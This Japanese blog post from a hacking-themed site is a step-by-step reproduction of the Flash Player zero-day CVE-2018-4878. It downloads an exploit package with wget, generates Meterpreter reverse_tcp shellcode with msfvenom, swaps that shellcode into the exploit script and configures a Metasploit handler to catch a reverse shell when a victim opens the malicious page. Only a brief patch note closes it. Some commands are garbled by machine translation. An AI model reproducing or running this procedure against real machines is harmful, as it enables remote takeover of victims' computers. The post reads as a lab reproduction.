Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86378641

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

0x01はじめに

Adobeは、2018年2月1日にセキュリティ通知を発行しました。

https://helpx.adobe.com/security/products/flash-player/apsa18-01.html

発表は、新しいFlash 0dayの脆弱性(CVE-2018-4878)が野生で悪用され、Windowsユーザーに対するターゲット攻撃を開始できると述べました。攻撃者は、ユーザーにMicrosoft Office Documents、Webページ、スパムメールなどを開くように誘導できます。悪意のあるフラッシュコードファイルを含む。

0x02脆弱性の影響

フラッシュプレーヤーの現在の最新バージョン28.0.0.137およびすべての以前のバージョン

0x03脆弱性の再発

環境テスト:攻撃マシン:Kaliターゲットマシン:Win7x64 +IE8.0 +Flash Player28.0.0.1371。 CVE-2018-4878の足音をダウンロードします

wget https://raw.githubusercontent.com/backlion/demo/master/cve-2018-4878.rar

2。圧縮されたファイルを減圧した後、CVE-2018-4878.pyおよびexploit.swfを見ることができます

wydiabjw04t9137.jpg

3. CVE-2018-4878.pyを変更する必要があります。元の著者は、コード内の雄弁な変数をtrueに変更しました。正しいものは次のように変更する必要があります:stageless=false。元の著者のExpアドレスを添付してください:https://github.com/anbai-inc/cve-2018-4878.git

bgow3delxai9138.png

4.第二に、元の電卓のシェルコードを変更して交換する必要があります。

gjuq1o1fzdv9139.jpg

5。KALIの下でMSFのShellCode:を生成します

MSFVENOM -PWINDOWS/METERPRETER/REVERSE_TCPLHOST=あなたのホストlport=Your Port -FPYTHONSHELLCODE.TXT

msaq4dsvakc9140.jpg

6. CVE-2018-4878.pyで生成されたシェルコードをShellDoceに置き換えます

qvhh0gg2w2w9141.jpg

7。CVE-2018-4878を実行します。ここでは、悪意のあるexploit.swfを生成するには、index.htmlと同じディレクトリにある必要があります

gn0m4j4slmo9142.jpg

8。デモンストレーションのために、index.htmlとexploit.swfをターゲットマシンに一緒にコピーして、IEブラウザで開きました(Webサーバーを構築してアドレスにアクセスすることにより、Webディレクトリにindex.htmlとexploit.swfを配置することもできます)。

die3hkenvfo9143.jpg

9.MSFの下のリスニング設定を設定します

MSF使用

Exploit/Multi/Handler

MSFエクスプロイト(ハンドラー)

PayloadWindows/MeterPreter/Reverse_tcpを設定します

MSFエクスプロイト(ハンドラー)

LHOST 10.0.0.217を設定します

MSFエクスプロイト(ハンドラー)

LPORT 443を設定します

MSFエクスプロイト(ハンドラー)

エクスプロイト

ybbytke0zvn9144.jpg

10。ターゲットの悪意のあるindex.htmlページが開かれると、リバウンドシェルをトリガーできます。

pkc2uyg2wqg9145.jpg

0x04

脆弱性修理構造は、公式ウェブサイトを通じて最新バージョンにアップグレードされます

https://get.adobe.com/cn/flashplayer/